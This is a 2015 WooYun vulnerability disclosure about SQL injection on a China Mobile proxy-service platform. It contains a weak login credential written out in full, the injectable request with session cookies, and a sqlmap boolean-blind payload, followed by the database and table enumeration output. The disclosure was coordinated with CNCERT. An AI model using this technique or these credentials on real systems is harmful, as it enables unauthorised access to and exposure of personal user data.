当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0150410

漏洞标题:中国移动某重要平台SQL注入导致大量用户详细信息泄漏(姓名/邮箱/地址/手机号/QQ号等)

相关厂商:中国移动

漏洞作者: Looke

提交时间:2015-10-29 18:45

修复时间:2015-12-17 15:28

公开时间:2015-12-17 15:28

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-29: 细节已通知厂商并且等待厂商处理中
2015-11-02: 厂商已经确认,细节仅向厂商公开
2015-11-12: 细节向核心白帽子及相关领域专家公开
2015-11-22: 细节向普通白帽子公开
2015-12-02: 细节向实习白帽子公开
2015-12-17: 细节向公众公开

简要描述:

RT

详细说明:

系统:中国移动代理服务器统一服务平台

http://**.**.**.**/


弱口令:liuxin 密码:123456
登陆后发现如下链接存在注入:

http://**.**.**.**/newsview.asp?News_ID=9


漏洞地址:

GET /newsview.asp?News_ID=9 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.71 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDCQRRAQCC=GCGNBCGAGGPBPKAEFKGHPBHI; User%5FType=%D3%C3%BB%A7; User%5FID=1692; User%5FAccount=liuxin; NewsFlag=29


ID参数存在注入

---
Parameter: News_ID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: News_ID=9 AND 3394=3394
---
[17:12:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008

漏洞证明:

数据库:

available databases [5]:
[*] master
[*] model
[*] msdb
[*] tempdb
[*] zps


二千多万数据信息泄漏

Database: zps
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.MT20150512 | 1300631 |
| dbo.MT20150724 | 1216847 |
| dbo.MT20150521 | 1112351 |
| dbo.MT20150529 | 1104653 |
| dbo.MT20150520 | 1087323 |
| dbo.MT20150619 | 1078151 |
| dbo.MT20150814 | 1077438 |
| dbo.MT20150730 | 1065513 |
| dbo.MT20150930 | 1014321 |
| dbo.MT20150618 | 1002796 |
| dbo.MT20150605 | 943391 |
| dbo.MT20150925 | 941665 |
| dbo.MT20150820 | 917963 |
| dbo.MT20150522 | 875826 |
| dbo.Stat | 860200 |
| dbo.MT20150604 | 845547 |
| dbo.MT20150716 | 821092 |
| dbo.MT20150626 | 797548 |
| dbo.MT20150513 | 785944 |
| dbo.MT20150911 | 774978 |
| dbo.MT20150612 | 768985 |
| dbo.MT20150806 | 759100 |
| dbo.MT20150525 | 757955 |
| dbo.MT20150515 | 748140 |
| dbo.MT20150703 | 717539 |
| dbo.MT20150710 | 711096 |
| dbo.MT20150819 | 703292 |
| dbo.MT20150821 | 699784 |
| dbo.MT20150717 | 666628 |
| dbo.MT20150528 | 649976 |
| dbo.MT20150501 | 630256 |
| dbo.MT20150507 | 606188 |
| dbo.MT20150910 | 601285 |
| dbo.MT20150530 | 598854 |
| dbo.MT20150508 | 587658 |
| dbo.MT20150723 | 583387 |
| dbo.MT20150601 | 572061 |
| dbo.MT20150625 | 570554 |
| dbo.MT20150514 | 555043 |
| dbo.MT20150929 | 542677 |
| dbo.MT20150705 | 526571 |
| dbo.MT20150731 | 519889 |
| dbo.MT20150623 | 510131 |
| dbo.MT20150807 | 498585 |
| dbo.MT20150725 | 494786 |
| dbo.MT20150519 | 490501 |
| dbo.MT20150709 | 476383 |
| dbo.MT20150516 | 471334 |
| dbo.MT20150523 | 467576 |
| dbo.MT20150620 | 466131 |
| dbo.MT20150606 | 456222 |
| dbo.MT20150611 | 451591 |
| dbo.MT20150616 | 448405 |
| dbo.MT20150918 | 446117 |
| dbo.MT20151029 | 446050 |
| dbo.MT20150617 | 445359 |
| dbo.MT20150603 | 441944 |
| dbo.MT20150926 | 438594 |
| dbo.MT20150702 | 419481 |
| dbo.MT20150526 | 414403 |
| dbo.MT20150722 | 414216 |
| dbo.MT20150527 | 409097 |
| dbo.MT20151023 | 403022 |
| dbo.MT20150917 | 391099 |
| dbo.MT20150907 | 383748 |
| dbo.MT20150701 | 372585 |
| dbo.MT20150828 | 370820 |
| dbo.MT20150924 | 369880 |
| dbo.MT20150610 | 367191 |
| dbo.MT20150615 | 364051 |
| dbo.MT20150509 | 363048 |
| dbo.MT20150704 | 362277 |
| dbo.MT20150609 | 360586 |
| dbo.MT20150906 | 358841 |
| dbo.MT20150624 | 355980 |
| dbo.MT20151016 | 353044 |
| dbo.MT20150801 | 347919 |
| dbo.MT20150812 | 343406 |
| dbo.MT20151001 | 336112 |
| dbo.MT20150822 | 326996 |
| dbo.MT20150818 | 323604 |
| dbo.MT20150602 | 318139 |
| dbo.MT20150916 | 313292 |
| dbo.MT20150630 | 311439 |
| dbo.MT20150908 | 310660 |
| dbo.MT20150608 | 309429 |
| dbo.MT20150714 | 307381 |
| dbo.MT20150627 | 306443 |
| dbo.MT20150914 | 305100 |
| dbo.MT20150919 | 304626 |
| dbo.MT20150629 | 303031 |
| dbo.MT20150817 | 301790 |
| dbo.MT20150728 | 301428 |
| dbo.MT20150811 | 299258 |
| dbo.MT20150923 | 298486 |
| dbo.MT20150711 | 296465 |
| dbo.Finance | 294621 |
| dbo.MT20150524 | 292272 |
| dbo.MT20150909 | 291320 |
| dbo.MT20150506 | 290831 |
| dbo.MT20150511 | 286425 |
| dbo.MT20150707 | 285185 |
| dbo.MT20150721 | 284167 |
| dbo.MT20150813 | 281533 |
| dbo.MT20150824 | 273909 |
| dbo.MT20150518 | 271676 |
| dbo.MT20150815 | 267474 |
| dbo.MT20150708 | 265154 |
| dbo.MT20150808 | 259589 |
| dbo.MT20150531 | 256310 |
| dbo.MT20150720 | 251164 |
| dbo.MT20151022 | 251160 |
| dbo.MT20150504 | 248356 |
| dbo.MT20150706 | 246225 |
| dbo.MT20150502 | 245435 |
| dbo.MT20150827 | 238763 |
| dbo.MT20151008 | 234516 |
| dbo.MT20150805 | 231733 |
| dbo.MT20150613 | 231690 |
| dbo.MT20151014 | 231209 |
| dbo.MT20151020 | 229877 |
| dbo.MT20150928 | 227405 |
| dbo.MT20150921 | 222047 |
| dbo.MT20150729 | 221324 |
| dbo.MT20150727 | 220879 |
| dbo.MT20150803 | 217732 |
| dbo.MT20151015 | 215287 |
| dbo.MT20150718 | 211080 |
| dbo.MT20150829 | 210303 |
| dbo.MT20150712 | 210123 |
| dbo.MT20150922 | 209444 |
| dbo.MT20150719 | 206663 |
| dbo.MT20150505 | 206100 |
| dbo.MT20150804 | 204653 |
| dbo.MT20150510 | 204634 |
| dbo.MT20151009 | 202417 |
| dbo.MT20150715 | 197408 |
| dbo.MT20150621 | 195673 |
| dbo.MT20150816 | 193286 |
| dbo.MT20150927 | 190966 |
| dbo.MT20150713 | 189635 |
| dbo.MT20150517 | 189051 |
| dbo.MT20150826 | 185623 |
| dbo.MT20150726 | 184240 |
| dbo.MT20151027 | 183812 |
| dbo.MT20150810 | 181070 |
| dbo.MT20151017 | 170336 |
| dbo.MT20151012 | 165449 |
| dbo.MT20150825 | 165161 |
| dbo.MT20151021 | 163153 |
| dbo.MT20151024 | 163039 |
| dbo.MT20151019 | 162500 |
| dbo.MT20150622 | 160195 |
| dbo.MT20151026 | 157108 |
| dbo.MT20150607 | 155359 |
| dbo.MT20150915 | 153941 |
| dbo.MT20150912 | 153011 |
| dbo.MT20150830 | 152814 |
| dbo.MT20150503 | 149904 |
| dbo.MT20150823 | 149206 |
| dbo.MT20150920 | 143914 |
| dbo.MT20150614 | 135904 |
| dbo.Send | 133039 |
| dbo.MT20150802 | 126744 |
| dbo.MT20151010 | 122862 |
| dbo.MT20151013 | 120010 |
| dbo.MT20151028 | 119794 |
| dbo.Customer | 115709 |
| dbo.MT20151018 | 112197 |
| dbo.MT20151003 | 111246 |
| dbo.MT20150809 | 103169 |
| dbo.MT20150831 | 93620 |
| dbo.MT20150628 | 87142 |
| dbo.MT20150913 | 86647 |
| dbo.MT20151006 | 85695 |
| dbo.MT20151002 | 85216 |
| dbo.MT20151025 | 83901 |
| dbo.Log | 72479 |
| dbo.MT20151004 | 62265 |
| dbo.MT20151005 | 59134 |
| dbo.MT20151011 | 55722 |
| dbo.MT20151007 | 53971 |
| dbo.Recv | 42201 |
| dbo.MT20150904 | 42055 |
| dbo.MT20150902 | 17847 |
| dbo.MT20150905 | 15111 |
| dbo.MT20150903 | 9977 |
| dbo.UserChannel | 7011 |
| dbo.MT20150901 | 4785 |
| dbo.BlackList1 | 2992 |
| dbo.Admin | 543 |
| dbo.Draft | 282 |
| dbo.DraftType | 178 |
| dbo.Badwords | 27 |
| dbo.ChannelSend | 18 |
| dbo.CycleSend | 16 |
| dbo.Channel | 1 |
| dbo.News | 1 |
| dbo.Setting | 1 |
+-----------------------------+---------+
Database: msdb
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| dbo.syspolicy_configuration | 4 |
+-----------------------------+---------+


11W用户详细信息:姓名、性别、地址、手机、传真、QQ、邮件

11W用户信息.png


未脱库,怕被查水表,点到为止

修复方案:

@@

版权声明:转载请注明来源 Looke@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-11-02 15:27

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向中国移动集团公司通报,由其后续协调网站管理部门处置.

最新状态:

暂无